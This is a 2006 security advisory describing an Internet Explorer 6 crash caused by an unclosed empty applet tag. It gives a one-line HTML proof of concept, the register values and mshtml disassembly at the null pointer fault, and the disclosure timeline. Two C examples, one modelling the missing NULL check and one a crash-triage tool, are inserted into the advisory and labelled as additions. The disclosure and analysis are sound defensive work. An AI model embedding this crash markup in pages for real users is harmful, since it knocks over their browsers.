[NT] Internet Explorer Null Pointer Dereference DoS

Subject: [NT] Internet Explorer Null Pointer Dereference DoS
Date: 29 May 2006 17:08:07 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  Internet Explorer Null Pointer Dereference DoS
------------------------------------------------------------------------


SUMMARY

Improper handling of HTML will cause a Null Pointer Dereference and crash 
Internet Explorer.

DETAILS

Vulnerable Systems:
 * Microsoft Internet Explorer version 6 SP2
 * Microsoft Internet Explorer version 6

When an empty applet tag is placed before any other HTML tag and left 
unclosed, Internet Explorer dereferences a null pointer and crashes.

Proof of Concept:
< applet >< h4 >< title > < / title >< base >
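To make the trigger concrete, the following is an added C model of the defect class, not mshtml's code: the struct, its field names and the "kind" encoding are assumptions chosen for illustration. An element opened before any other element has no enclosing element, so its parent pointer is NULL; the "before" routine dereferences that pointer without a check, exactly as the advisory's faulting instruction does, while the "after" routine validates it and returns an error. The sample tag list is constructed from the proof of concept (the closing title tag is ignored, so the three tags are treated as nested).

```c
/* Added example, not mshtml code: a hypothetical model of the defect class the
 * advisory describes. Field names and the "kind" encoding are assumptions. */
#include <stddef.h>

struct elem {
    const char *tag;
    struct elem *parent;   /* NULL for an element opened before any other element */
    unsigned flags;        /* low nibble: element kind, dispatched on like "and ecx,0xf" */
};

enum { MAX_ELEMS = 16 };

/* Open a chain of nested elements from a tag list (constructed input). The first
 * tag has no enclosing element, which is exactly the advisory's trigger. */
static int open_elements(const char *const *tags, int n, struct elem *out) {
    if (n > MAX_ELEMS) n = MAX_ELEMS;
    for (int i = 0; i < n; i++) {
        out[i].tag = tags[i];
        out[i].parent = (i > 0) ? &out[i - 1] : NULL;
        out[i].flags = (unsigned)(i + 1) & 0xfu;   /* arbitrary kind code per depth */
    }
    return n;
}

/* "Before": mirrors the faulting sequence. The enclosing element is loaded and
 * dereferenced with no test against NULL; with e->parent == NULL this reads
 * address 0, the access violation shown in the advisory's dump. */
static unsigned enclosing_kind_unchecked(const struct elem *e) {
    const struct elem *owner = e->parent;     /* mov edi,[esi+0x14] */
    return owner->flags & 0xfu;               /* mov eax,[edi] / and ecx,0xf */
}

/* "After": validate the pointer and report failure instead of dereferencing it. */
static int enclosing_kind_checked(const struct elem *e, unsigned *kind) {
    if (e == NULL || e->parent == NULL) return -1;   /* no enclosing element: refuse */
    *kind = e->parent->flags & 0xfu;
    return 0;
}

/* The advisory's proof of concept as an opening-tag sequence (constructed). */
static const char *const SAMPLE_TAGS[] = {"applet", "h4", "title"};

static int build_sample(struct elem *out) {
    return open_elements(SAMPLE_TAGS, 3, out);
}
```

Calling enclosing_kind_unchecked on the applet element (the first one opened) would fault exactly like the browser; the checked variant returns -1 for it and succeeds for every element that does have an enclosing one.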

These are the register values and the ASM dump at the time of the access 
violation:
 eax=00000000 ebx=00000000 ecx=00e78d38 edx=00e7a704 esi=0012a268
 edi=00000000 eip=7d6d2db4 esp=0012a228 ebp=0012a25c

 7d6d2d7d e868f9ffff       call    mshtml+0x2226ea (7d6d26ea)
 7d6d2d82 50               push    eax
 7d6d2d83 e835f8ffff       call    mshtml+0x2225bd (7d6d25bd)
 7d6d2d88 85c0             test    eax,eax
 7d6d2d8a 8945f8           mov     [ebp-0x8],eax
 7d6d2d8d 0f85c4020000     jne     mshtml+0x223057 (7d6d3057)
 7d6d2d93 8b461c           mov     eax,[esi+0x1c]
 7d6d2d96 8b4e18           mov     ecx,[esi+0x18]
 7d6d2d99 8365f400         and     dword ptr [ebp-0xc],0x0
 7d6d2d9d 8365fc00         and     dword ptr [ebp-0x4],0x0
 7d6d2da1 8b7e14           mov     edi,[esi+0x14]
 7d6d2da4 8945f0           mov     [ebp-0x10],eax
 7d6d2da7 e88462e4ff       call    mshtml+0x69030 (7d519030)
 7d6d2dac 3bc7             cmp     eax,edi
 7d6d2dae 0f8402020000     je      mshtml+0x222fb6 (7d6d2fb6)
 FAULT ->7d6d2db4 8b07             mov     eax,[edi]
                        ds:0023:00000000=????????
 7d6d2db6 8bc8             mov     ecx,eax
 7d6d2db8 83e10f           and     ecx,0xf
 7d6d2dbb 49               dec     ecx
 7d6d2dbc 0f849c010000     je      mshtml+0x222f5e (7d6d2f5e)
 7d6d2dc2 49               dec     ecx
 7d6d2dc3 0f84b3000000     je      mshtml+0x222e7c (7d6d2e7c)
 7d6d2dc9 49               dec     ecx
 7d6d2dca 49               dec     ecx
 7d6d2dcb 746c             jz      mshtml+0x222e39 (7d6d2e39)
 7d6d2dcd 83e904           sub     ecx,0x4
 7d6d2dd0 0f85a5010000     jne     mshtml+0x222f7b (7d6d2f7b)
 7d6d2dd6 8bcf             mov     ecx,edi
 7d6d2dd8 e8482ffeff       call    mshtml+0x205d25 (7d6b5d25)
 7d6d2ddd 85c0             test    eax,eax
 7d6d2ddf 7430             jz      mshtml+0x222e11 (7d6d2e11)
 7d6d2de1 837e0400         cmp     dword ptr [esi+0x4],0x0
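The dump already contains what a triage tool needs: edi is loaded from [esi+0x14], compared against a call's return value (cmp eax,edi / je) but never tested against zero, and then dereferenced by mov eax,[edi] while edi=00000000. The following C program is an added example, not part of the advisory, that automates that classification: it parses a WinDbg-style register line, resolves the faulting memory operand against the snapshot, and reports a NULL-pointer read. SAMPLE_REGS and SAMPLE_FAULT are constructed from the advisory's values; the operand grammar ([reg], [reg+0xNN], [reg-0xNN]) and the read/write heuristic are simplifications that cover the instructions in this dump.

```c
/* Added example (not from the advisory): triage an access violation from a
 * WinDbg-style register line plus the faulting instruction, the two pieces of
 * evidence the advisory prints. SAMPLE_* below are constructed from its dump. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { NREGS = 8 };
static const char *const REG_NAMES[NREGS] =
    {"eax", "ebx", "ecx", "edx", "esi", "edi", "ebp", "esp"};

typedef struct { uint32_t v[NREGS]; unsigned seen; } regs_t;

typedef enum { CLS_UNKNOWN = 0, CLS_NULL_READ, CLS_NULL_WRITE,
               CLS_OTHER_READ, CLS_OTHER_WRITE } cls_t;

typedef struct { uint32_t addr; int is_write; cls_t cls; } fault_t;

static int reg_index(const char *name) {
    for (int i = 0; i < NREGS; i++)
        if (strcmp(name, REG_NAMES[i]) == 0) return i;
    return -1;
}

/* Parse "eax=00000000 ebx=... edi=00000000 ..." tokens in any order; unknown
 * tokens (eip, ds:0023:...) are skipped. Returns 1 if any register was found. */
static int parse_regs(const char *text, regs_t *r) {
    memset(r, 0, sizeof *r);
    const char *p = text;
    while (*p) {
        while (isspace((unsigned char)*p)) p++;
        if (!*p) break;
        char name[8]; unsigned long val; int n = 0;
        if (sscanf(p, "%7[a-z]=%lx%n", name, &val, &n) == 2 && n > 0) {
            int i = reg_index(name);
            if (i >= 0) { r->v[i] = (uint32_t)val; r->seen |= 1u << i; }
            p += n;
        } else {
            while (*p && !isspace((unsigned char)*p)) p++;
        }
    }
    return r->seen != 0;
}

/* Resolve a memory operand of the form [reg], [reg+0xNN] or [reg-0xNN] against
 * the register snapshot. Direction is a heuristic: cmp/test only read; otherwise
 * a memory operand left of the comma is the destination (write). */
static int resolve_operand(const char *insn, const regs_t *r, fault_t *f) {
    const char *lb = strchr(insn, '[');
    const char *rb = lb ? strchr(lb, ']') : NULL;
    if (!lb || !rb) return 0;

    char reg[8] = {0}; char sign = 0; unsigned long off = 0;
    int n = sscanf(lb + 1, "%7[a-z]%c0x%lx", reg, &sign, &off);
    if (n < 2) return 0;
    if (n == 2 && sign != ']') return 0;                 /* "+"/"-" without an offset */
    if (n == 3 && sign != '+' && sign != '-') return 0;

    int i = reg_index(reg);
    if (i < 0 || !(r->seen & (1u << i))) return 0;       /* base register not in snapshot */
    uint32_t base = r->v[i];
    f->addr = (sign == '-') ? base - (uint32_t)off : base + (uint32_t)off;

    const char *m = insn;
    while (isspace((unsigned char)*m)) m++;
    int read_only = strncmp(m, "cmp", 3) == 0 || strncmp(m, "test", 4) == 0;
    const char *comma = strchr(insn, ',');
    f->is_write = !read_only && comma != NULL && lb < comma;
    return 1;
}

/* Windows never maps the lowest 64 KiB of a user-mode process, so a fault
 * address below 0x10000 is a NULL (or NULL-plus-small-offset) dereference. */
static cls_t classify(uint32_t addr, int is_write) {
    if (addr < 0x10000u) return is_write ? CLS_NULL_WRITE : CLS_NULL_READ;
    return is_write ? CLS_OTHER_WRITE : CLS_OTHER_READ;
}

static cls_t triage(const char *regs_text, const char *insn, fault_t *f) {
    regs_t r;
    memset(f, 0, sizeof *f);
    if (!parse_regs(regs_text, &r) || !resolve_operand(insn, &r, f)) return CLS_UNKNOWN;
    f->cls = classify(f->addr, f->is_write);
    return f->cls;
}

/* Constructed from the advisory's register dump and "FAULT ->" line. */
static const char SAMPLE_REGS[] =
    "eax=00000000 ebx=00000000 ecx=00e78d38 edx=00e7a704 esi=0012a268\n"
    "edi=00000000 eip=7d6d2db4 esp=0012a228 ebp=0012a25c";
static const char SAMPLE_FAULT[] = "mov     eax,[edi]";

int main(void) {
    static const char *const label[] =
        {"unknown", "NULL-pointer read", "NULL-pointer write", "read", "write"};
    fault_t f;
    cls_t c = triage(SAMPLE_REGS, SAMPLE_FAULT, &f);
    printf("%s -> address 0x%08x: %s\n", SAMPLE_FAULT, (unsigned)f.addr, label[c]);
    return 0;
}
```

A read from address 0 with no attacker-influenced offset matches the denial-of-service classification in the advisory's title; the tool reports writes and non-null fault addresses as separate classes because those crashes need a closer look before they can be called DoS-only.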

Vendor Status:
Microsoft Security Response Center - "The vulnerability will be fixed in 
an upcoming service pack."

Disclosure Timeline:
Feb 06 - Vulnerabilities discovered.
08 Mar 06 - Vendor contacted.
22 Mar 06 - Vendor confirmed vulnerabilities.
25 May 06 - Public release.


ADDITIONAL INFORMATION

The information has been provided by Thomas Waldegger <bugtraq@morph3us.org>.
The original article can be found at:
http://morph3us.org/advisories/20060525-msie6-sp2-1.txt


